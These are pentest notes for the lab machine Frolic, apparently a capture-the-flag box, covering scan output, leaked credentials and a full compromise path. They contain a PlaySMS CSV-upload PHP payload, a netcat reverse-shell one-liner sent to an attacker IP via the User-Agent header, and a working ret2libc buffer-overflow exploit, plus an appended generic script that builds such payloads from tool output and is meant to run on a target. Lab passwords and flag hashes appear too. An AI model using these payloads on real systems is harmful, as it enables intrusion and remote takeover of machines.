Frolic (10.10.10.111) - pentest notes
=====================================

Notes recovered from a CherryTree (OSCP template) database. Node names are kept as headings; empty template nodes are listed with only their field names.

Methodology
-----------

Network Scanning
    ☐ nmap -sn 10.11.1.*
    ☐ nmap -sL 10.11.1.*
    ☐ nbtscan -r 10.11.1.0/24
    ☐ smbtree
    Software Versions
    Potential Exploits

Individual Host Scanning
    ☐ nmap --top-ports 20 --open -iL iplist.txt
    ☐ nmap -sS -A -sV -O -p- ipaddress
    ☐ nmap -sU ipaddress

Service Scanning
    WebApp
        ☐ Nikto
        ☐ dirb
        ☐ dirbuster
        ☐ wpscan
        ☐ dotdotpwn
        ☐ view source
        ☐ davtest\cadaver
        ☐ droopscan
        ☐ joomscan
        ☐ LFI\RFI Test
    Linux\Windows
        ☐ snmpwalk -c public -v1 ipaddress 1
        ☐ smbclient -L //ipaddress
        ☐ showmount -e ipaddress port
        ☐ rpcinfo
        ☐ Enum4Linux
    Anything Else
        ☐ nmap scripts (locate *nse* | grep servicename)
        ☐ hydra
        ☐ MSF Aux Modules
        ☐ Download the software

Exploitation
    ☐ Gather Version Numbers
    ☐ Searchsploit
    ☐ Default Creds
    ☐ Creds Previously Gathered
    ☐ Download the software

Post Exploitation
    Linux
        ☐ linux-local-enum.sh
        ☐ linuxprivchecker.py
        ☐ linux-exploit-suggestor.sh
        ☐ unix-privesc-check.py
    Windows
        ☐ wpc.exe
        ☐ windows-exploit-suggestor.py
        ☐ windows_privesc_check.py
        ☐ windows-privesc-check2.exe

Priv Escalation
    ☐ access internal services (portfwd)
    ☐ add account
    Windows
        ☐ List of exploits
    Linux
        ☐ sudo su
        ☐ KernelDB
        ☐ Searchsploit

Final
    ☐ Screenshot of IPConfig\WhoamI
    ☐ Copy proof.txt
    ☐ Dump hashes
    ☐ Dump SSH Keys
    ☐ Delete files

Log Book
--------

(empty)

Enumeration
-----------

TCP

    nmap -sC -sV -oA ./frolic 10.10.10.111

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 10:58 EDT
    Nmap scan report for 10.10.10.111
    Host is up (0.097s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE     VERSION
    22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
    |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
    |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    9999/tcp open  http        nginx 1.10.3 (Ubuntu)
    |_http-server-header: nginx/1.10.3 (Ubuntu)
    |_http-title: Welcome to nginx!
    Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: -1h49m41s, deviation: 3h10m31s, median: 17s
    |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: frolic
    |   NetBIOS computer name: FROLIC\x00
    |   Domain name: \x00
    |   FQDN: frolic
    |_  System time: 2020-04-02T20:29:31+05:30
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-04-02T14:59:30
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds

    Takeaways: SSH (22), Samba with guest access and no required SMB signing (139/445), and nginx on the non-standard port 9999. The web port is where the rest of the enumeration happens.

UDP

    (no results recorded)

Web Services

    http://10.10.10.111:9999/admin/

        <html>
        <head>
        <title>Crack me :|</title>
        <!-- Include CSS File Here -->
        <link rel="stylesheet" href="css/style.css"/>
        <!-- Include JS File Here -->
        <script src="js/login.js"></script>
        </head>
        <body>
        <div class="container">
        <div class="main">
        <h2>c'mon i m hackable</h2>
        <form id="form_id" method="post" name="myform">
        <label>User Name :</label>
        <input type="text" name="username" id="username"/>
        <label>Password :</label>
        <input type="password" name="password" id="password"/>
        <input type="button" value="Login" id="submit" onclick="validate()"/>
        </form>
        <span><b class="note">Note : Nothing</b></span>
        </div>
        </div>
        </body>
        </html>

    http://10.10.10.111:9999/admin/js/login.js

        var attempt = 3; // Variable to count number of attempts.
        // Below function Executes on click of login button.
        function validate(){
        var username = document.getElementById("username").value;
        var password = document.getElementById("password").value;
        if ( username == "admin" && password == "superduperlooperpassword_lol"){
        alert ("Login successfully");
        window.location = "success.html"; // Redirecting to other page.
        return false;
        }
        else{
        attempt --;// Decrementing by one.
        alert("You have left "+attempt+" attempt;");
        // Disabling fields after 3 attempts.
        if( attempt == 0){
        document.getElementById("username").disabled = true;
        document.getElementById("password").disabled = true;
        document.getElementById("submit").disabled = true;
        return false;
        }
        }
        }

    The login check is entirely client-side: the credentials are hard-coded in the JavaScript, and a successful "login" is just a redirect to success.html, which can be requested directly.

    Nikto

        (no results recorded)

    Dirb\DirBuster

        DirBuster 1.0-RC1 - Report
        http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
        Report produced on Thu Apr 02 17:00:47 EDT 2020
        --------------------------------

        http://frolic.htb:9999
        --------------------------------
        Directories found during testing:

        Dirs found with a 200 response:

        /
        /admin/
        /test/
        /backup/
        /dev/backup/

        Dirs found with a 403 response:

        /dev/
        /admin/css/
        /admin/js/
        /loop/
        /backup/loop/
        /loop/loop/
        /backup/loop/loop/
        /loop/loop/loop/
        /backup/loop/loop/loop/
        /loop/loop/loop/loop/
        /backup/loop/loop/loop/loop/
        /loop/loop/loop/loop/loop/
        /backup/loop/loop/loop/loop/loop/
        /loop/loop/loop/loop/loop/loop/
        /backup/loop/loop/loop/loop/loop/loop/
        /loop/loop/loop/loop/loop/loop/loop/
        /backup/loop/loop/loop/loop/loop/loop/loop/
        /loop/loop/loop/loop/loop/loop/loop/loop/
        /backup/loop/loop/loop/loop/loop/loop/loop/loop/

        --------------------------------
        Files found during testing:

        Files found with a 200 responce:

        /test/index.php
        /admin/js/login.js
        /backup/index.php
        /dev/backup/index.php

        --------------------------------

        The /loop/ entries are a self-referencing directory that DirBuster recurses into until its depth limit; they carry no content and can be ignored. The interesting hits are /admin/, /test/, /backup/ and /dev/backup/.

    CMS

        (empty)

    WebDav

        (empty)

Other Services

    SMB

        (empty)

    SNMP

        (empty)

    DB

        (empty)

    Other

        PlaySMS (see Exploitation)

Script Results

    (empty)

Exploitation
------------

PlaySMS

    Service Exploited: PlaySMS
    Vulnerability Type: RCE
    Exploit POC: https://www.exploit-db.com/exploits/42044
    Description: Upload a malicious CSV for Remote Code Execution
    Discovery of Vulnerability: Dirbuster and manual navigation

    Exploit Code Used

    CSV:

        Name,Mobile,Email,Group code,Tags
        <?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>,22

    User-Agent String:

        User-Agent: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.XX.XX 1234 >/tmp/f

    The PHP in the CSV is evaluated by the import, so the command to run is carried in the request's User-Agent header rather than in the file itself. Start the listener (nc -lvnp 1234) before re-requesting the page with the crafted User-Agent; the shell arrives as www-data.

    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Post Exploitation
-----------------

Post Exploitation

    ls -la
    total 36
    drwxr-xr-x 3 ayush ayush 4096 Sep 25  2018 .
    drwxr-xr-x 4 root  root  4096 Sep 23  2018 ..
    -rw------- 1 ayush ayush 2781 Sep 25  2018 .bash_history
    -rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
    -rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
    drwxrwxr-x 2 ayush ayush 4096 Sep 25  2018 .binary
    -rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
    -rw------- 1 ayush ayush  965 Sep 25  2018 .viminfo
    -rwxr-xr-x 1 ayush ayush   33 Sep 25  2018 user.txt

    cd ./.binary
    www-data@frolic:/home/ayush/.binary$ ls
    rop   <<<<<<<<<<<<<<<<

Host Information
    Operating System
    Architecture
    Domain
    Installed Updates

Running Processes
    Process List

Network
    IPConfig\IFConfig
    Network Processes
    ARP
    DNS
    Route

Users & Groups
    Users
    Groups

Installed Applications
    Installed Applications

Scheduled Jobs
    Scheduled Tasks

File System
    Writeable Files\Directories
    Directory List

Goodies (privilege escalation: /home/ayush/.binary/rop)

    Service Exploited: /home/ayush/.binary/rop (32-bit ELF, run as www-data, gives a root shell)
    Vulnerability Type: stack buffer overflow, exploited with return-to-libc (system/exit/"/bin/sh")
    Exploit POC: custom, below
    Description: 52 bytes of padding reach the saved return address; the return address is pointed at system() in libc with exit() as its return address and the libc-resident "/bin/sh" string as its argument.

    Discovery of Vulnerability

        www-data@frolic:/home/ayush/.binary$ ldd rop
                linux-gate.so.1 =>  (0xb7fda000)
                libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
                /lib/ld-linux.so.2 (0xb7fdb000)

        www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
           245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
           627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
          1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

        www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
           112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
           141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
           450: 0002edf0   197 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
           558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
           616: 00115fa0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
           652: 0002eda0    31 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.10
           876: 0002ebf0    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
          1046: 0011fb80    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
          1394: 001b2204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
          1506: 000f3870    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
          2108: 001b2154     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
          2263: 0002e9f0    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
          2406: 000f4c80     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2

        www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/bash
        www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
         15ba0b /bin/sh

    Collected values (all offsets are relative to the libc base reported by ldd):

        libc    = 0xb7e19000
        system  = 0x0003ada0
        exit    = 0x0002e9d0
        /bin/sh = 0x0015ba0b

    Caveat: the libc base printed by ldd is only reusable as an absolute address if ASLR is disabled on the target (cat /proc/sys/kernel/randomize_va_space should read 0); with ASLR on, the base changes on every run and has to be leaked instead.

    Exploit Code Used

        #!/usr/bin/env python3
        import struct
        import sys

        def addr(x):
            # 32-bit little-endian pointer
            return struct.pack("<I", x)

        buf = b"A" * 52                    # padding up to the saved return address
        libc = 0xb7e19000                  # libc base from ldd (ASLR off)
        shell = addr(libc + 0x0015ba0b)    # "/bin/sh" string inside libc
        system = addr(libc + 0x0003ada0)   # system()
        exit = addr(libc + 0x0002e9d0)     # exit(), used as system()'s return address

        # ret -> system(); system() returns into exit(); "/bin/sh" sits where system() expects its argument
        payload = buf + system + exit + shell
        sys.stdout.buffer.write(payload)   # raw bytes, no trailing newline

    Then run:

        /home/ayush/.binary/rop $(python3 /tmp/exploit.py)

    Root Shell

    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Passwords

    login.js: if ( username == "admin" && password == "superduperlooperpassword_lol"){
    /backup/password.txt gives us "password - imnothuman"
    /backup/user.txt gives us "user - admin"
    http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ eventually gets idkwhatispass

Hashes

    (empty)

Proof\Flags\Other

    User - 2ab95909cf509f85a6f476b59a0c2fe0
    Root - 85d3fdf03f969892538ba9a731826222
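The ret2libc steps above (read the libc base from ldd, the system/exit offsets from readelf -s, the "/bin/sh" offset from strings -atx, then assemble padding + system + exit + "/bin/sh") are done by hand in the notes. The following is an added example, not the exploit script from the notes, that automates the same steps by parsing the tool output as text, so the offsets are never retyped. The sample tool output embedded below is constructed from the lines captured in these notes; the 52-byte padding is taken from the notes' exploit, and the bad-character check is an addition (argv cannot carry NUL bytes through $(...)).

```python
#!/usr/bin/env python3
"""Build a 32-bit ret2libc payload from the text output of ldd, readelf -s
and strings -atx. Added example; not the original exploit script."""
import re
import struct

# Constructed samples: excerpts of the tool output recorded in the notes.
LDD_OUTPUT = """\
        linux-gate.so.1 =>  (0xb7fda000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
        /lib/ld-linux.so.2 (0xb7fdb000)
"""

READELF_OUTPUT = """\
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
   558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
"""

STRINGS_OUTPUT = """\
 15ba0b /bin/sh
"""


def libc_base(ldd_text):
    """Return the load address ldd reports for libc.so.6."""
    m = re.search(r"libc\.so\.6\s*=>\s*\S+\s*\((0x[0-9a-fA-F]+)\)", ldd_text)
    if not m:
        raise ValueError("libc.so.6 not found in ldd output")
    return int(m.group(1), 16)


def symbol_offset(readelf_text, name):
    """Return st_value of an exact symbol name; 'system@@GLIBC_2.0' -> 'system'.
    Exact matching keeps __libc_system and _exit from being picked up."""
    for line in readelf_text.splitlines():
        parts = line.split()
        if len(parts) < 8:
            continue
        if parts[7].split("@")[0] == name:
            return int(parts[1], 16)
    raise KeyError(name)


def string_offset(strings_text, needle):
    """Return the hex file offset strings -atx prints for an exact string."""
    for line in strings_text.splitlines():
        off, _, s = line.strip().partition(" ")
        if s == needle:
            return int(off, 16)
    raise KeyError(needle)


def build_payload(base, system_off, exit_off, binsh_off, pad=52):
    """padding | &system | &exit (system's return address) | &"/bin/sh" (argument)."""
    p32 = lambda x: struct.pack("<I", x)
    return (b"A" * pad + p32(base + system_off)
            + p32(base + exit_off) + p32(base + binsh_off))


def bad_chars(payload, bad=b"\x00\x0a"):
    """Bytes that would not survive delivery via argv and $(...)."""
    return sorted({b for b in payload if b in bad})


def payload_from_outputs(ldd_text, readelf_text, strings_text, pad=52):
    base = libc_base(ldd_text)
    payload = build_payload(base,
                            symbol_offset(readelf_text, "system"),
                            symbol_offset(readelf_text, "exit"),
                            string_offset(strings_text, "/bin/sh"), pad)
    if bad_chars(payload):
        raise ValueError("payload contains bytes that argv cannot carry: %r" % bad_chars(payload))
    return payload


if __name__ == "__main__":
    import sys
    # Raw bytes so the shell can pass them unchanged as argv[1]:
    #   ./rop $(python3 ret2libc.py)
    sys.stdout.buffer.write(payload_from_outputs(LDD_OUTPUT, READELF_OUTPUT, STRINGS_OUTPUT))
```

On the real target, replace the three constructed strings with the live output of ldd, readelf -s and strings -atx (for example via subprocess.check_output); the parsing and the address arithmetic stay the same. The same ASLR caveat applies: the base from ldd is only an absolute address when randomize_va_space is 0.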